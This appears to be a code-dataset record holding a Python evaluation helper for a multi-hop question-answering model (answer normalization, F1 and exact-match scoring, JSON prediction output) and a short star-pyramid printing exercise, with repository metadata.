return sp_pred, span_pred, ans_type_pred
# def evaluate(eval_file, answer_dict):
# f1 = exact_match = total = 0
# for key, value in enumerate(answer_dict):
# total += 1
# ground_truths = eval_file[key]["answer"]
# prediction = value
# cur_EM = exact_match_score(prediction, ground_truths)
# cur_f1, _, _ = f1_score(prediction, ground_truths)
# exact_match += cur_EM
# f1 += cur_f1
# exact_match = 100.0 * exact_match / total
# f1 = 100.0 * f1 / total
# return {'exact_match': exact_match, 'f1': f1}
def normalize_answer(s):
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
normalized_prediction = normalize_answer(prediction)
normalized_ground_truth = normalize_answer(ground_truth)
ZERO_METRIC = (0, 0, 0)
if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
return ZERO_METRIC
if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
return ZERO_METRIC
prediction_tokens = normalized_prediction.split()
ground_truth_tokens = normalized_ground_truth.split()
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return ZERO_METRIC
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1, precision, recall
def exact_match_score(prediction, ground_truth):
return (normalize_answer(prediction) == normalize_answer(ground_truth))
def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir):
"""write predictions to json file
Arguments:
sp_preds {[type]} -- [description]
answer_preds {[type]} -- [description]
orig_data {[type]} -- [description]
predict_file {[type]} -- [description]
output_dir {[type]} -- [description]
"""
if len(answer_preds) == 0:
answer_preds = ["place_holder"] * len(orig_data)
all_pred = {}
all_pred['answer'] = OrderedDict()
all_pred['sp'] = OrderedDict()
for idx, data in enumerate(orig_data):
all_pred['answer'][data['_id']] = answer_preds[idx]
all_pred['sp'][data['_id']] = sp_preds[idx]
with open(output_dir, 'w') as fid:
json.dump(all_pred, fid)
| 32.47619
| 124
| 0.646418
|
import torch
import numpy as np
import json, sys, re, string
import collections
from collections import Counter
from collections import OrderedDict
def get_sp_pred(pred_sp_idx, data):
pred = []
for p in pred_sp_idx:
if p < len(data):
pred.append([data[p].doc_title[0], data[p].sent_id])
return pred
def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length):
sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy()
ans_type_logits_np = batch_logits[1].detach().cpu().numpy()
batch_index = batch_index.numpy().tolist()
sp_pred, span_pred, ans_type_pred = [], [], []
for idx, data in enumerate(batch_index):
pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ]
print(pred_sp_idx)
if len(pred_sp_idx) != 0:
sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data]))
else:
sp_pred.append([])
ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:]))
if ans_type_pred[-1] == 0:
span_pred.append("no")
elif ans_type_pred[-1] == 1:
span_pred.append("yes")
else:
span_pred.append("")
return sp_pred, span_pred, ans_type_pred
def normalize_answer(s):
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
normalized_prediction = normalize_answer(prediction)
normalized_ground_truth = normalize_answer(ground_truth)
ZERO_METRIC = (0, 0, 0)
if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
return ZERO_METRIC
if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
return ZERO_METRIC
prediction_tokens = normalized_prediction.split()
ground_truth_tokens = normalized_ground_truth.split()
common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return ZERO_METRIC
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1, precision, recall
def exact_match_score(prediction, ground_truth):
return (normalize_answer(prediction) == normalize_answer(ground_truth))
def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir):
if len(answer_preds) == 0:
answer_preds = ["place_holder"] * len(orig_data)
all_pred = {}
all_pred['answer'] = OrderedDict()
all_pred['sp'] = OrderedDict()
for idx, data in enumerate(orig_data):
all_pred['answer'][data['_id']] = answer_preds[idx]
all_pred['sp'][data['_id']] = sp_preds[idx]
with open(output_dir, 'w') as fid:
json.dump(all_pred, fid)
| true
| true
|
f705e584e7382dd36ff080ed8c2d1c45f243aa82
| 255
|
py
|
Python
|
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
#-*-coding=utf-8-*-
def pyramid(n):
most = 2*n - 1
for i in range(1,n+1):
star = 2*i - 1
space = n - i
print(" "*space + "*"*star)
def test():
pyramid(3)
pyramid(4)
pyramid(5)
if __name__ == "__main__":
test()
| 14.166667
| 31
| 0.529412
|
def pyramid(n):
most = 2*n - 1
for i in range(1,n+1):
star = 2*i - 1
space = n - i
print(" "*space + "*"*star)
def test():
pyramid(3)
pyramid(4)
pyramid(5)
if __name__ == "__main__":
test()
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.